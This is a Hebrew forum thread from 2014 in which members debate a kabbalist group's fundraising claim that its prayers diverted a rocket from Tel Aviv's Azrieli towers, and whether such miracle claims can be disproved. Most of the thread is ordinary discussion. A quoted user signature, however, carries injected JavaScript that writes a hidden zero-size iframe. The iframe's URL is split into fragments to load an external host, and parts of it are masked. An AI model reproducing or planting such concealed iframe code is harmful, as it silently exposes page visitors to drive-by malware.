בית פורומים עצור כאן חושבים

האם ניתן לחשוף שקר של מחלק ברכות ועושה תיקונים?

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-3/11/2014 10:32 לינק ישיר 
האם ניתן לחשוף שקר של מחלק ברכות ועושה תיקונים?

באשכול הכתבות הביא ת"ט סיפור מרגיז, גם אותי.

דווח על תוכן פוגעני

נשלח ב-3/11/2014 10:34 לינק ישיר 

מקובלי קבר רחל: מנענו נפילת טיל בעזריאלי
בחוברת שהופצה על ידי מוסדות ''קבר רחל'', כדי לגייס תרומות להפעלתם, נטען כי קבוצת מקובלים הצליחה למנוע ירי טילים לעבר ישראל במהלך מבצע ''צוק איתן''
יונתן אוריך | 2/11/2014 18:56
לא צה''ל, לא חיל האוויר ולא כיפת ברזל: מקובלי מוסדות קבר רחל טוענים בחוברת שהופצה בסוף השבוע האחרון כדי לגייס תרומות בעבורם, כי הצליחו לסכל ירי של רקטה מרצועת עזה אל עבר איזור קניון עזריאלי ובסיס ''הקרייה'' בתל אביב, זאת במהלך מבצע ''צוק איתן''.

בחוברת, שמופצת מעת לעת על ידי מוסדות ''קבר רחל'' במטרה לגייס כספים לתרומות, נטען כי במהלך מבצע ''צוק איתן'' הצליחו מקובלי הישיבה למנוע ירי רקטות לעבר ישראל. ''רק מעטים יודעים את שהתרחש הרחק מעין רואים, אי שם בבונקר נסתר בפאתי בית לחם, על קברה של אמו של עם ישראל, רחל אמנו'', נכתב בחוברת, ''במהלך כל ימי המבצע, יומם ולילה, עמדו המקובלים עטופים בטליתות ומצויידים בשופרות, מתחננים עם דמעות בעיניים, וכשהמקובלים הקדושים משלבים ידיים עם רחל אמנו - הניסים לא חדלו להגיע''.

מה שנכתב בהמשך החוברת יצליח להפתיע גם אתכם: ''טיל יצא מעזה. כיפת ברזל מיוחדת בחישובים המדויקים שלה. אנחנו יודעים איפה הטיל עומד ליפול ברמה של רדיוס של 200 מ'. הטיל הזה עומד לנחות במגדלי עזריאלי, בקריה או על פסי הרכבת. איך שלא נסתכל על זה, מאות יכולים לשלם בחייהם!".

''כששמעו המקובלים ממוסדות קבר רחל את הסיפור המופלא, הם לא התפלאו כלל, הם רק ביקשו לברר את השעה המדויקת שהנס הזה קרה, ואז התברר איך קרה הנס המופלא'', הסבירו במוסדות קבר רחל, ''כפי שמספר ראש מוסדות קבר רחל המקובל הרב משה מנחם קלוגר שליט"א: פורסם בחדשות שהחמאס מאיים לשגר טילים ארוכי טווח בשעה 9:00 בערב. כינסנו מיד את כל המקובלים שבמוסדותינו, התעטפנו בטליתות, הוצאנו את השופרות, וערכנו את אחד התיקונים המיוחדים לסילוק הדינים מעל עם ישראל, וב"ה נמנע אסון כבד מאוד מעל עם ישראל".

תוקן על ידי מיימוני ב- 03/11/2014 10:35:19

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 10:37 לינק ישיר 

יש!

צריך כנראה תיקון מיוחד כדי להדביק...

זה המקור

ת"ט שהביא את הסיפור קרא לו "שיא החוצפה". אני לא הייתי מתחייב שזה שיא, אבל זה בהחלט מקומם.

בעל בעמיו ביקש הוכחות, וזה מביא אותנו לנושא:

האם אפשר להוכיח או להפריך  טענות מהסוג של "מקובלים" אלו? (נראה לי ששותף סוד שלנו היה מתנגד להם גם כן ובוודאי לטענות שוא אלו).

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 10:42 לינק ישיר 

אז הנה כמה שאלות שראוי להציג לאותם מגייסי כספים:

1.כמה הם? מלבד המקובל קלוגר ששמו מתפרסם שם?

מי הם חבריו, כלומר מה שמותיהם? מה הכשרתם? כלומר, בני כמה הם, מה הם למדו, והיכן רכשו את הידע שלהם? האם יש להם תעודות הסכמה? ממי? ומי הסמיך את הסומכים?

מה הם עושים כל היום? כמה דפי גמרא הם לומדים בחודש?

2. באיזה תיקון הם משתמשים? האם הם מסתמכים על כתבי האר"י במישרין או על שיטות אחרות? מהיכן קיבלו אותן?

מה עדיפותם של מקובלים אחרים?

3. מה התנאים הנדרשים כדי לבצע את התיקון הזה? האם אפשר להטיל אותו על חיילי צה"ל? האם אפשר להקים יחידת מקובלים? מה תנאי הקבלה?

אם הם מסוגלים לעצור טילים, האם הם מוכנים לקבל על עצמם את ההגנה על מדינת ישראל ולחסוך את הכסף של "כיפת ברזל"? אפשר להציע לכל אחד משכורת מכובדת...

4. על מנת שהתקציב הרשמי יאושר, צריך מבחנים, ממש כמו כיפת ברזל.

למשל, להעיף טילים ולבקש מהם לעצור את הטילים.

5. האם מותר לקחת כסף על תיקונים כאלו? על תלמוד תורה אסור לקחת, כידוע, אבל אולי תיקון קבלי זה אחרת?

השאלות הן מרמות שונות. קשה להאמין שמקובלים אלו (וכאמור יש לחשוד שגם מקובלים יותר מקובלים יפסלו אותם, אבל איני מכיר כדי לדעת ואני רק חושד) יסכימו לניסויים גם תמורת משכורת. בוודאי יש איזה נימוק משכנע עבור זה.

אבל יש שאלות שכן משמעותי לחכות לתשובה.

ראשית, זיהוי שמותיהם של המקובלים ופירוט עיסוקם במשך היום. מי שמתבקש לתרום כסף למוסד כזה, ירצה לדעת שהמקובל יושב ולומד כל היום ולא רק מתפאר במה שעשה או שלא עשה.

שנית, כמו כל מומחה בתחום, על המקובל לפרט מה הידע שלו, היכן קנה אותו, ובאילו כלים הוא משתמש. ומי הסמיך אותו ואלו מבחנים היה עליו לעבור.

הצגת שאלות כאלו לפני מי שתובע לקבל כספי צדקה (או כל כספים שהם) נראית דרישה חיונית.

ואולי כדאי היה לפרסם את הדרישה הזו בכל אותם אמצעי תקשורת חרדיים ולא חרדיים שמפרסמים גם את הסיפורים ההם.

למשל, ב-מעריב NRG שמשם זה מגיע.

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 11:12 לינק ישיר 

שני סיפורים יפים.

1, בא יהודי ומספר לי סיפורי איוב על עצמו ועל משפחתו. אני בתמימות שואל אותו אפי' שזה אמת אתה לא צריך להפחיד אנשים מספיק שתספר רק חלק ונעזור לך.
שהיהודי ראה שאני רציני, אז הוא אומר לי שאני הגלה לך סוד, הרב שלי הציע לי להגזים בכדי שיעזרו לי אבל אם אתה אומר שזה מפחיד אותך ואתה תעזור בלי הפחדות אז האמת היא שאפי' רבע מיזה לא נכון.

2, בא יהודי ואומר לי ממש במסכנות יש לי (כמעט אמר לא עליכם) 12 ילדים,,,, לפני שהמשיך אני אומר לו בזעקה:
אתה משוגע ?! תשמח שיש לך 12 כי יש אחרים שלא מצליחים להביא אפי' אחד.
אז הוא אומר לי: אם ככה אתה חושב אז אני אגלה לך סוד שהאמת יש לי 16 ילדים, אבל מתוך ניסיוני שאני אומר שיש לי 16 טורקים לי את הדלת בפרצוף. 12 יותר מתקבלת כמסכנות אצל התורמים.

מה שאני רוצה להגיד כאן הוא שכל בר דעת מבין שההוא צריך כסף וכמה שהוא מגזים כנראה הוא צריך את הכסף יותר בדחיפות. אז אנא על תהיו פנאטים ותתנו להם כסף ותעזרו להם.
למה לעשות עניין מיזה בזמן שאף אחד לא קורא את הדף כפשוטו רק כולנו קוראים את הדף כמו שצריך, כלומר כמה שהסובל מגזים כנראה הוא צריך עזרה יותר דחוף.

כולנו יודעים את הסיפור של הרב והמתלמד להיות רב.
נכנס אישה בערב שבת ושואלת את הרב האם אפשר לעשות קידוש על לחם.
הרב פונה למתלמד ושואל נוו מה אתה אומר ? המתלמד משיב שמותר. הרב מיד נזעק ואומר: אתה לא יכול להיות רב. כי רב אמיתי היה שומע שאין לה לשבת דגים ובשר ויין, התשובה לשאלתה היא לתת לה כסף לקנות בשר ודגים ויין לקדש את השבת.

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 11:43 לינק ישיר 

המברך את הברכות ועושה את התקונים, יש להניח שהוא חושב ברצינות כי הברכות שלו מתקבלות,
הוא לא מרגיש כלל רגשות אשמה, כמו למשל המקובלים הרב בצרי ועדס שהבטיחו את הרבנות של ירושליים.
 הנזק שהם גורמים, קטן יותר מהנזק  שגורמים המדברים בשם ה', ומצווים דברים כאילו ה' מסר להם את השליחות למסור את המסר,
המברכים מזיקים לכמה עשרות פתאיים, והאחרונים מזיקים לרבבות אנשים תמימי דרך.

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 12:54 לינק ישיר 

מקסמן

שני סיפורים יפים מאד! (האם אפשר לסמוך על כך ששניהם אמיתיים ולהשתמש בהם כעובדות? - כמובן, יתכן שהאומר התאים את התגובה שלו לדבריך...).

ירוחם

צודק, צודק.

אבל עדיין ראוי לטפל במזיקים הקטנים ולתת כלים שיכולים לעזור גם נגד הטעיות גדולות.

ובתוך דבריך הערת על דבר חשוב מאד. הכלים שהצעתי טובים, אולי, נגד רמאים מקצועיים מנפקי ניסים. אבל האם הם יעזרו למי שמאמין בעצמו שהוא באמת עושה ניסים? שיבחן ויראה אם הוא באמת כזה, ויחדל להטעות אחרים?

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 15:06 לינק ישיר 

אני יכול להעיד שאף טיל לא פגע בעזריאלי.

טוב שכן טוב!

דדווח על תוכן פוגעני

סמל אישי
נשלח ב-3/11/2014 15:18 לינק ישיר 

מיימוני, איפה ואיפה בין "ניסים" דהיום ל"ניסים" של פעם? למה?

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 15:51 לינק ישיר 

אלי

לא הבנתי.

האם כוונתך שאני או מאן דהוא מייחס מעמד של "נס" לאירוע שמתבאר באופן אחר? אולי לנסים המתוארים בתורה?

לא כל נס בא על מנת להוכיח משהו, ולא כל נס מביא איתו תג מחיר שמוגש למי שנהנה ממנו.

יש נסים שכן. לדוגמא, הניסוי של אליהו בהר הכרמל נועד להראות שה' הוא האלוקים ואין ממש בעבודה זרה. אפשר לערער אם המעשה היה ונברא אבל בוודאי שאם הוא היה כפי שהוא מתואר הוא אמור להוות ראיה. (וגם שם אפשר לדון על הסבר תחליפי, כפי שהגמרא אומרת).

אמנם אם נדרג את הנסים וה"נסים" על ציר של רמת ההוכחה, למשל לפי הביקורות שמציע הפילוסוף דיויד יום וביקורות נוספות, אולי נוסח פופר, אזי נוכל לקבל כללים שיועילו לדחית מצגי שווא. ואמנם סבורני שכללים כאלו אינם נחוצים לבאי הפורום שלנו. הם כבר בקיאים ורגילים לחשוד, אולי יותר מדי, סמיילי. מדובר בכללים שכדאי להציע לציבור הרחב שכן הולך שולל אחרי פירסומים מהסוג דלעיל.

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 15:57 לינק ישיר 

אלי
אם תעיין היטב בלב נקי ובמחשבה טהורה- לא מגויסת. תגלה שהניסים של היום הם הרבה הרבה יותר גדולים מהניסים של פעם.- רק בעייניך תביט!
הגמרא בפסחים אומרת- גדול הנס של קיבוץ גלויות- מיום שנבראו בה שמיים וארץ, אחד האחרונים כתב-
 גדול נס קיבוץ הגלויות מקריעת ים סוף.
זה רק על קיבוץ הגלויות, על אחת כמה וכמה על יתר הניסים הגלויים והנסתרים על קיומנו היום במדינתו.
הניסים של פעם? קטן עלינו.

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 17:35 לינק ישיר 

מיימוני כתב:
אלי

לא הבנתי.

האם כוונתך שאני או מאן דהוא מייחס מעמד של "נס" לאירוע שמתבאר באופן אחר? אולי לנסים המתוארים בתורה?

לא כל נס בא על מנת להוכיח משהו, ולא כל נס מביא איתו תג מחיר שמוגש למי שנהנה ממנו.

יש נסים שכן. לדוגמא, הניסוי של אליהו בהר הכרמל נועד להראות שה' הוא האלוקים ואין ממש בעבודה זרה. אפשר לערער אם המעשה היה ונברא אבל בוודאי שאם הוא היה כפי שהוא מתואר הוא אמור להוות ראיה. (וגם שם אפשר לדון על הסבר תחליפי, כפי שהגמרא אומרת).

אמנם אם נדרג את הנסים וה"נסים" על ציר של רמת ההוכחה, למשל לפי הביקורות שמציע הפילוסוף דיויד יום וביקורות נוספות, אולי נוסח פופר, אזי נוכל לקבל כללים שיועילו לדחית מצגי שווא. ואמנם סבורני שכללים כאלו אינם נחוצים לבאי הפורום שלנו. הם כבר בקיאים ורגילים לחשוד, אולי יותר מדי, סמיילי. מדובר בכללים שכדאי להציע לציבור הרחב שכן הולך שולל אחרי פירסומים מהסוג דלעיל.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תן דוגמא לניסים שאתה מאמין שהתרחשו במציאות. הניסים המתוארים בתנ"ך, שקר או אמת? (בראש האשכול תיארת את הטענה על הטילים בעזריאלי כ"שקר". הבה נמשיך באותה טרימנולוגיה)

תוקן על ידי eli_s ב- 03/11/2014 17:37:22

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 17:37 לינק ישיר 

ירוחם, ההגדרה שלנו ל"נס" כנראה שונה בתכלית. לי נדמה שאם אכן תעיין בלב נקי ומחשבה טהורה - לא דובים ולא יער, לא ניסים ולא נעליים.

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 18:53 לינק ישיר 

מימוני, שאלת שאלה מצויינת, אבל לא הצעת שום תשובה. האם ניתן לחשוף שקר של מחלק ברכות ועושה תיקונים?
לא יודע, השאלות ששאלת לא חושפות שום שקר, הן סתם שאלות.
אז אולי שמא חלילה אי אפשר לחשוף שום שקר?
ונניח שאכן קרה משהו חריג עם איזה טיל, ואכן באותה שעה המקובלים שליט"א עשו תיקון חריג מדרגה א'?
אתה יכול כמו אלי להניח שאין ולא היו נסים, ולכן אין הבדל בין סיפור המקובלים לסיפור במקרא
או להניח שפעם היו נסים והיום לא
או שלצדיקים גדולים היו נסים ולמקובלים לא
אבל מה לזה ולחשיפת שקרים, זה חושף רק את האמונות וההנחות של כל אחד..

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 19:26 לינק ישיר 

דדווח על תוכן פוגעני

נשלח ב-3/11/2014 19:45 לינק ישיר 

כמה הערות קטנות וכלליות על הנאמר עד כה:
1. מקובלים אלו לכאורה יונקים את עליונותם מהמקום - קבר רחל - ולא מעצמיותם (משהו בסגנון שמות האפיפיורים), והם כנראה מבקשים כסף לעזרה להיות במקום - כשמדובר לכאורה בבערך 7.30 ש"ח ליום למקובל (אם אני זוכר נכון כך עולה האוטובוס). זה ליגיטימי וראוי, אבל הוצאת עלונים בשביל בערך 73 ש"חX30 יום בחודש לפי מניין אנשים (שכן היו צריכים לאסוף מניין כדי לערוך תיקון, אם היו 200 איש לא היה צריך לטרוח) לא מצדיק עשרות אלפי שקלים שעולים עלונים. נדמה לי שלא קשה למצוא ספונסר בשביל 2,200 ש"ח בחודש בקבר רחל.
2. אם הם מצדיקים ישיבתם במקום ע"י אירוע חד פעמי בתקופה בעייתית, אולי באמת לא צריך שיישבו שם בכל יום, רק ביום או תקופה מסויימת יזדמנו למקום ויערכו את התיקון. עם כל הכבוד, העולם קיים לפחות 5,773 שנה בלי מקובלים בקבר רחל.
3. במידה והצידוק הוא מופת-הצלה לעם ישראל, הם צריכים להציג 'קבלות' על כל יום שהם שם, כיצד הוא מסוגל לעזור לעם.
4. אם היו צריכים לטרוח לאסוף מקובלים, אולי כדאי שבמקביל לעלונים או בכללם יחפשו גם מקובלים שיבואו, ולא רק כסף?
5. לדעתי השקר אינו הסיפור, אם כי ראוי להציג הוכחות מדוייקות ע"פ הצבא והמקובלים לאימות הסיפור והקבלת השעות. השקר הוא הדרישה הכספית הבאה בעקבות הסיפור, אלא שמדובר בשקר גלוי ולא צריך לחשוף אותו.
6. מקס, המקובלים לכאורה אינם עניים, יש להם (אפשרות) פרנסה נוחה, אלא שהם בוחרים לשבת בקבר רחל ולעשות תיקון בדיוק ברגע שיעוף טיל לכיוון עזריאלי. סיפור כזה עוד לא שמעת, לדעתי הוא הרבה יותר מעניין מהשניים שלך ואינני יודע מה מצא מיימוני יותר בשלך ממה שמוכח בכתבה הנ"ל...

7. (הפרדתי, כי זה משמעותי מבחינתי) צריך לדעת: באופן כללי, א"א להפריך שום מופת של שום בבא. המופתים הם לא שחור-לבן ותמיד יהיו 1,000,000 תירוצים למה עבד או למה לא, תמיד יספרו עוד 10 סיפורים נושאי טלפונים של ס' מראש-פינה וג' מהרצליה פיתוח שיניחו את המצב ב'תיקו' (בזמנו פתחתי אשכול שנקרא 'מופתים לא מדבר אליי', שעסק בזה שקיימים מופתים, אבל אני חולק בכל תוקף על ייחוס 'בעל המופת' בעקבות כך).
הבעיה האמיתית, ולדעתי צריך לתת את הדעת עליה באופן מעשי, היא השימון של ה'מקובלים' בכסף, קשרים ומאפיות. אני מכיר אישית אנשים שניזוקו בבדברים הרבה יותר בעייתיים מכסף ועד היום לא מעיזים לספר. על אחד מהם אני יודע שעד היום הולך מדי פעם לכל מיני מופתיים כאלה רק מהבושה מחבריו שאיך יכול להיות שהוא לא מאמין שמי שסבא-רבה-רבה שלו היה רב בית כנסת לפני 400 שנה אינו איש אלוקים ממש - ומי שחושב אחרת יפגוש את אסי אבוטבול בחלום...
את הבעיות האלו צריך לפתור, וכדאי לחשוב כיצד!

תוקן על ידי אחרחוק ב- 03/11/2014 19:50:33

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > האם ניתן לחשוף שקר של מחלק ברכות ועושה תיקונים?
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 3 4 לדף הבא סך הכל 4 דפים.

bholext